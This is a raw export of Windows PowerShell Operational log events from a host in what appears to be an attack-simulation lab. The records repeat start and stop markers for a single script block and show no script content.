LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470347
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470346
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470345
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470344
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470343
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470342
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470341
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470340
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470339
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470338
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470337
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470336
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470335
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470334
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470333
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470332
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470331
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470330
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470329
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470328
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470327
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470326
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470325
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470324
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470323
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470322
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470321
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470320
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470319
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470318
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470317
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470316
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470315
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470314
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470313
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470312
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470311
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470310
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470309
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470308
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470307
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470306
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470305
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470304
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470303
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470302
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470301
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470300
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470299
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470298
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470297
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470296
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470295
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470294
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470293
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
